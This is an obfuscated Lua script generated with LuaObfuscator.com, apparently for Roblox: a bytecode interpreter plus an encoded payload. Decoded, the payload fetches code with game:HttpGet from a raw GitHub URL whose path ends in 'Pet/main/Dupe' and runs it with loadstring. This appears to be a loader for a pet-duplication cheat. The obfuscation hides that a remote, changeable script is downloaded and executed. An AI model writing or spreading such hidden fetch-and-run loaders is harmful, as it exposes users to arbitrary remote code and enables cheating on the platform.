--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v75=v2(v0(v20,16));if v19 then local v81=v5(v75,v19);v19=nil;return v81;else return v75;end end end);local function v21(v22,v23,v24)if v24 then local v76=(v22/((1493 -(76 + 1415))^(v23-1)))%(2^(((v24-(1 -0)) -(v23-(1 -0))) + (1 -0))) ;return v76-(v76%(545 -(371 + 127 + 46))) ;else local v77=(1 + 1 + 0)^(v23-((630 -(212 + 128)) -(108 + 181))) ;return (((v22%(v77 + v77))>=v77) and (2 -1)) or (450 -(258 + 192)) ;end end local function v25()local v38=0 -0 ;local v39;while true do if (v38==1) then return v39;end if (v38==(0 -0)) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1;end end end local function v26()local v40=0 -0 ;local v41;local v42;while true do if (v40==((4 -1) -(2 -0))) then return (v42 * (40 + 37 + 179)) + v41 ;end if (((0 + 0) -0)==v40) then v41,v42=v1(v16,v18,v18 + (2 -0) );v18=v18 + (283 -(165 + 116)) ;v40=4 -3 ;end end end local function v27()local v43=1978 -(797 + 1181) ;local v44;local v45;local v46;local v47;while true do if (v43==(1 + 0)) then return (v47 * (11926209 + 4851007)) + (v46 * (7422 + 58114)) + (v45 * (596 -(118 + 222))) + v44 ;end if ((523 -(449 + (746 -(226 + 446))))==v43) then v44,v45,v46,v47=v1(v16,v18,v18 + 3 );v18=v18 + (5 -1) ;v43=987 -(744 + 242) ;end end end local function v28()local v48=v27();local v49=v27();local v50=1 + 0 ;local v51=(v21(v49,4 -(503 -(314 + 186)) ,49 -29 ) * (((1694 -(893 + 800)) + 1)^(205 -(68 + 12 + 93)))) + v48 ;local v52=v21(v49,1379 -((2225 -(1763 + 116)) + 1012) ,2 + 29 );local v53=((v21(v49,543 -(452 + 59) )==(1 + 0)) and  -1) or (1 + 0) ;if (v52==(0 + 0)) then if (v51==(0 + 0)) then return v53 * (0 + 0) ;else v52=2 -1 ;v50=445 -(203 + 242) ;end elseif (v52==(3907 -(14 + 1583 + 198 + 65))) then return ((v51==(0 + 0)) and (v53 * ((1 + 0 + 0)/((1625 -381) -(947 + (2185 -(1463 + 425))))))) or (v53 * NaN) ;end return v8(v53,v52-(325 + 698) ) * (v50 + (v51/((3 -1)^(349 -(142 + 155))))) ;end local function v29(v30)local v54;if  not v30 then local v78=(0 -0) -0 ;while true do if (v78==(0 -0)) then v30=v27();if (v30==(0 + 0)) then return "";end break;end end end v54=v3(v16,v18,(v18 + v30) -1 );v18=v18 + v30 ;local v55={};for v67=1 + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if ((1 + 2)==v56) then v63=nil;while true do local v82=210 -(138 + 72) ;local v83;while true do if (v82==(0 -0)) then v83=0 -0 ;while true do if (1==v83) then if (0==v57) then local v103=0;local v104;while true do if (v103==(0 + 0)) then v104=0 -0 ;while true do if (v104~=(1920 -(519 + 1400))) then else v60={};v57=1;break;end if (v104==0) then local v127=0 -0 ;while true do if ((0 + 0)==v127) then v58={};v59={};v127=1;end if (v127==(1660 -(1406 + 253))) then v104=1 + 0 ;break;end end end end break;end end end if (v57==(3 -2)) then local v105=0 + 0 ;while true do if (v105==(0 -0)) then v61={v58,v59,nil,v60};v62=v27();v105=1;end if (v105~=(1 + 0)) then else v63={};v57=1822 -(482 + 1338) ;break;end end end break;end if (0==v83) then local v102=1166 -(608 + 558) ;while true do if (v102~=0) then else if (v57~=2) then else local v108=794 -(733 + 61) ;local v109;while true do if (v108==0) then v109=0;while true do if ((759 -(250 + 508))==v109) then for v143=1 + 0 ,v27() do local v144=749 -(228 + 521) ;local v145;local v146;while true do if (v144~=(1 + 0)) then else while true do if (v145==0) then v146=v25();if (v21(v146,1320 -(685 + 634) ,1 + 0 )==0) then local v161=0;local v162;local v163;local v164;while true do if ((0 -0)==v161) then local v165=870 -(485 + 385) ;while true do if (v165~=(0 + 0)) then else v162=v21(v146,2,10 -7 );v163=v21(v146,4,6);v165=1;end if (v165==(1987 -(14 + 1972))) then v161=4 -3 ;break;end end end if (v161~=(175 -(93 + 81))) then else local v166=0;local v167;while true do if (v166~=(0 -0)) then else v167=1284 -(963 + 321) ;while true do if (v167==(1 + 0)) then v161=2;break;end if (v167==(820 -(83 + 737))) then local v173=1937 -(1054 + 883) ;while true do if (v173==(0 + 0)) then v164={v26(),v26(),nil,nil};if (v162==(0 + 0)) then local v178=0;local v179;local v180;while true do if (v178==0) then v179=0 -0 ;v180=nil;v178=575 -(209 + 365) ;end if (v178==(1 + 0)) then while true do if (v179~=(0 -0)) then else v180=0;while true do if (v180~=0) then else v164[3]=v26();v164[178 -(143 + 31) ]=v26();break;end end break;end end break;end end elseif (v162==(45 -(29 + 15))) then v164[306 -(77 + 226) ]=v27();elseif (v162==(107 -(79 + 26))) then v164[3 + 0 ]=v27() -((3 -1)^16) ;elseif (v162==3) then local v183=0 + 0 ;local v184;local v185;while true do if (v183==0) then v184=0;v185=nil;v183=1;end if (v183==1) then while true do if (v184==(0 -0)) then v185=0 + 0 ;while true do if (v185==0) then v164[3 -0 ]=v27() -(2^(1286 -(531 + 739))) ;v164[1 + 3 ]=v26();break;end end break;end end break;end end end v173=1;end if (v173~=(1179 -(573 + 605))) then else v167=1 + 0 ;break;end end end end break;end end end if (v161~=2) then else local v168=0;local v169;while true do if (v168==(0 + 0)) then v169=0;while true do if (v169==1) then v161=1 + 2 ;break;end if (v169~=0) then else if (v21(v163,1,1 + 0 )~=(130 -(38 + 91))) then else v164[2]=v63[v164[87 -(29 + 56) ]];end if (v21(v163,2,2)==1) then v164[3]=v63[v164[3]];end v169=1;end end break;end end end if (v161==3) then if (v21(v163,3,6 -3 )~=(1 + 0)) then else v164[7 -3 ]=v63[v164[4]];end v58[v143]=v164;break;end end end break;end end break;end if (v144==0) then local v151=0;while true do if (v151~=0) then else local v160=851 -(140 + 711) ;while true do if (v160~=(1 + 0)) then else v151=1;break;end if (v160==(677 -(327 + 350))) then v145=0 -0 ;v146=nil;v160=1;end end end if (v151==1) then v144=1 -0 ;break;end end end end end v57=3;break;end if (v109==(0 + 0)) then for v147=1,v62 do local v148=0;local v149;local v150;while true do if (v148==(164 -(159 + 5))) then local v152=0;while true do if (v152==(1118 -(711 + 407))) then v149=v25();v150=nil;v152=1;end if (v152==(957 -(600 + 356))) then v148=1;break;end end end if (v148==(1 + 0)) then if (v149==1) then v150=v25()~=(451 -(443 + 8)) ;elseif (v149==(2 -0)) then v150=v28();elseif (v149~=(1 + 2)) then else v150=v29();end v63[v147]=v150;break;end end end v61[3]=v25();v109=1;end end break;end end end if (v57~=3) then else local v110=0 -0 ;local v111;while true do if ((0 -0)==v110) then v111=0;while true do if (v111~=1) then else return v61;end if (v111==(0 + 0)) then local v141=156 -(72 + 84) ;while true do if (v141~=1) then else v111=1;break;end if (v141~=(0 -0)) then else for v154=1 -0 ,v27() do v59[v154-(1 -0) ]=v33();end for v156=1,v27() do v60[v156]=v27();end v141=2 -1 ;end end end end break;end end end v102=1;end if (v102~=(1 + 0)) then else v83=1;break;end end end end break;end end end break;end if (v56~=0) then else v57=0 -0 ;v58=nil;v56=1;end if ((3 -1)==v56) then local v79=0;while true do if (v79~=(2 -1)) then else v56=3;break;end if (v79==0) then v61=nil;v62=nil;v79=1 + 0 ;end end end if (v56==(2 -1)) then local v80=0 -0 ;while true do if (1==v80) then v56=2;break;end if (v80==0) then v59=nil;v60=nil;v80=1;end end end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==3) then A,B=v32(v11(v74));if  not A[1] then local v94=v35[4][v70] or "?" ;error("Script error at ["   .. v94   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (2==v69) then v74=nil;v74=function()local v84=v64;local v85=v65;local v86=v66;local v87=v32;local v88={};local v89={};local v90={};for v95=0 -0 ,v73 do if ((v95>=v86) or ((1081 + 1223)==(515 + 2111))) then v88[v95-v86 ]=v72[v95 + (2 -1) ];else v90[v95]=v72[v95 + 1 ];end end local v91=(v73-v86) + (904 -(83 + 820)) ;local v92;local v93;while true do local v96=0 + 0 ;while true do if (((5144 -((1167 -340) + (1259 -248)))>=(1851 + 625)) and ((1 + 0)==v96)) then if ((v93<=(1034 -(863 + 168))) or ((1746 + 716 + 2246)==(3968 -739))) then if ((v93<=(1 + 0)) or ((10420 -6308)<=((758 -348) + 111))) then if ((v93>(0 + 0)) or (738==(435 + 964 + 248))) then local v112=0 + 0 ;local v113;while true do if ((v112==(0 -(0 + 0))) or ((6924 -4447)>=3299)) then v113=v92[2];v90[v113]=v90[v113](v13(v90,v113 + 1 ,v71));break;end end else local v114=0;local v115;local v116;while true do if ((v114==(0 + 0)) or ((846 -((124 -(67 + 17)) + 243))==(393 + 241))) then v115=v92[1 + 1 ];v116=v90[v92[3]];v114=1 -0 ;end if (((3582 -(216 + 883))>=(907 -(78 + 4))) and (v114==(1 + 0))) then v90[v115 + (2 -1) ]=v116;v90[v115]=v116[v92[8 -4 ]];break;end end end elseif ((v93==(1821 -(1083 + 736))) or ((14329 -10110)<(886 -(4 + 55)))) then v90[v92[1 + (209 -(198 + 10)) ]]=v37[v92[9 -6 ]];else v90[v92[2]]=v92[(58 -31) -((8 -4) + 20) ]~=(0 -0) ;end elseif ((((65 -22) + 930)>388) and (v93<=(11 -6))) then if ((3302<=(1840 + 1555)) and (v93==(1012 -(481 + 328 + 199)))) then do return;end else local v120=0 -0 ;local v121;local v122;local v123;local v124;while true do if ((v120==(1 + 1)) or ((4537 -((2053 -(1113 + 709)) + 1521))>=(11843 -7868))) then for v137=v121,v71 do local v138=0;local v139;while true do if (((3960 -((1519 -929) + 568))>(295 + 373)) and (v138==((0 -0) + 0))) then v139=1661 -(91 + 1570) ;while true do if (((5356 -(354 + 1141))==((4071 -(96 + 1774)) + 1660)) and (v139==(0 + 0))) then v124=v124 + 1 + 0 ;v90[v137]=v122[v124];break;end end break;end end end break;end if ((v120==(0 -0)) or ((5245 -1544)==(2219 + 700))) then local v135=0 -(1377 -(1276 + 101)) ;while true do if (((2 -1)==v135) or ((3507 + 675)==(3833 -(317 + 1380)))) then v120=2 -(716 -(441 + 274)) ;break;end if ((v135==0) or ((7898 -5104)>(14352 -9460))) then v121=v92[(2440 -(1205 + 95)) -(1102 + 36) ];v122,v123=v87(v90[v121](v13(v90,v121 + 1 ,v92[3])));v135=(491 -(261 + 66)) -(57 + 105 + 1) ;end end end if (((2917 -(999 + 817))>=(957 -((684 -477) + 639))) and (v120==((1 -0) + 0))) then local v136=(0 -0) -0 ;while true do if (((900 -(112 + 284))==504) and (v136==(1 -(0 + 0)))) then v120=2;break;end if ((v136==(0 + 0)) or (3951<=(4453 -1301))) then v71=(v123 + v121) -(1145 -(955 + (263 -74))) ;v124=0;v136=1;end end end end end elseif (((2957 + 1233)>(2378 -(413 + (1226 -(342 + 374))))) and (v93>(1629 -(1135 + 488)))) then v90[v92[5 -(1194 -(653 + 538)) ]]=v92[2 + 1 ];else v90[v92[1 + 1 ]]();end v70=v70 + (4 -3) ;break;end if ((v96==(1104 -(704 + 400))) or (((5155 -(247 + 36)) + 105)<(1126 + 169 + 22))) then local v101=0;while true do if ((v101==0) or (((12388 -7402) -(800 + 329))>((7973 -(469 + 857)) -2065))) then v92=v84[v70];v93=v92[(1158 -(27 + 1129)) -(3 -2) ];v101=1 + 0 ;end if (((1 + 0)==v101) or ((617 -(312 + 282))>=(4991 -(13 + 1325)))) then v96=1 + 0 ;break;end end end end end end;v69=3;end if (v69==0) then v70=1;v71= -1;v69=1;end if (v69==1) then v72={...};v73=v12("#",...) -1 ;v69=2;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403393O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A616865696D32346B2F5065742F6D61696E2F4475706500093O0012023O00013O001202000100023O00202O000100010003001207000300044O0003000400014O0005000100044O00015O00022O00063O000100012O00043O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
